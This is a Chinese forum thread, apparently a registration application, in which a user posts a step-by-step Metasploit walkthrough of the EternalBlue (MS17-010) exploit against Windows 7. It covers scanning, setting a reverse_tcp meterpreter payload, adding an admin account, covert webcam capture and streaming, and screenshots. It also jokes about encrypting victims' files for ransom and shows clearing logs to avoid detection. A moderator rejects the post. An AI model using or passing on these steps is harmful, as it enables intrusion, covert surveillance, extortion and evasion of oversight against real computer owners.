发表于 2022-1-24 14:51

申请标题:woprrty123

1、申 请 I D:woprrty123
2、个人邮箱:3515630142@qq.com
3、原创技术文章:原创文章


永恒之蓝漏洞利用(ms17-010)漏洞利用


一、打开kali和win7查看IP。(1)        Windows7作为靶机(2)        Kali作为攻击机(最新版kaili)官网最新版是21.4哦
二、打开kali进入终端输入nmap +IP查看靶机是否开启445端口。三、在kali中输入 msfconsole(等待一会可能会有点慢)
四、进入后输人search ms17-010(就是之前的永恒之蓝,也就是新闻上报道的比特币勒索病毒)五、找到exploit windows/smb/ms17_010_eternalblue六、运行 use exploit/windows/smb/ms17_010_eternalblue,也可以USE 序列号哦七、输入show options 查看和配置RHOST(靶机)和LHOST(操作机)八、设置TCP连接 set payload windows/x64/meterpreter/reverse_tcp九、配置环境set rhost 192.168.1.3(win7 ip)
set lhost 192.168.1.4(kali ip) 查看是否配置成功show options即为设置成功十、输入run或exploit进行攻击就这样入侵成功十一、可以创建用户 net user xxxx 1234 /add(xxxx用户名 1234密码)十二、net localgroup administrators xxxx /add (将用户设置为管理员权限十一、重新打开一个终端 rdesktop+IP就进去了)注意十一和十二两个命令行在meterpreter >模式下是不存在的,得拿到shell才能实现被控端浑然不觉,很正常的在运行接下来,先用sysinfo看看被控端的信息,使用webcam_list 看看被控制的电脑有没有摄像头,routes查看路由表这个screenshot,就是截取被控制端电脑的屏幕看看(如下图,截好的图片一般都在主目录里)这个webcam_snap是打开被控制端的摄像头,拍一张图片(注意笔记本拍摄时摄像头旁边的灯会亮一下,容易被发现)下面这个webcam_stream就是开启摄像头直播,把摄像头拍摄的数据流传送回来,直接直播,哈哈哈!(注意笔记本拍摄时摄像头旁边的灯会一直亮,百分百会被发现,除了瞎子之外!直到你关闭摄像头直播,按下ctrl+c即可停止,)这个就是直播呢shell,获取被控制系统的shell,就是像在你被控端电脑上运行cmd一样,啥命令都可以执行,最高权限,被控制端上没有任何的提示。可以cmd rar 把被控制端上看着有用的文件给加密压缩了,哈哈,完了留个消息,给钱给密码,不给钱,你也打不开文件,哈哈 想哭 就是这么干的……除了上面说的这个外我们还可以用命令行让对方关机,恶搞他,前提是拿到shell后输入shutdown -s -t 时间(时间设为0是立马关机,这里数字的单位是秒)5分钟就是300秒dir下被控制端的c盘有哪些文件能做到很多呢,上传,下载文件,执行文件 等等等 没有做不到,只有想不到(至于命令什么的我就不发了,你们自己百度)…… msf是不是很牛。(msf就是上面输入的msfconsole)
玩完了,记得清理掉痕迹,清理被控制端的日志----clearev,做到真正的神不知鬼不觉Clearev这个命令需要在meterpreter >模式下输入才有用,问题来了,我们怎么在C:\Windows\system32>模式下退到meterpreter >模式呢?其实很简单,只要按下ctrl+C即可退回至meterpreter>模式 注:Ctrl+c在kali里面是用于中止或者退出这个模式,exit是直接退出


制作不易,希望官方通过

Hmily 发表于 2022-1-25 17:15

抱歉,未能达到申请要求,申请不通过,可以关注论坛官方微信(吾爱破解论坛),等待开放注册通知。

发表于 2022-1-25 19:02

Hmily 发表于 2022-1-25 17:15
抱歉,未能达到申请要求,申请不通过,可以关注论坛官方微信(吾爱破解论坛),等待开放注册通知。

这都不行,那什么样的文章才能通过,晕....

发表于 2022-1-25 19:03

妈的,这都通过不了,怎样还能通过?

Hmily 发表于 2022-1-26 17:30

游客 111.16.174.x 发表于 2022-1-25 19:03
妈的,这都通过不了,怎样还能通过?

不要说脏话,这种使用教程是不行的,申请要求都明确写了,需要技术分析文章,并达到精华优秀水平。
页: [1]
查看完整版本: 申请标题:woprrty123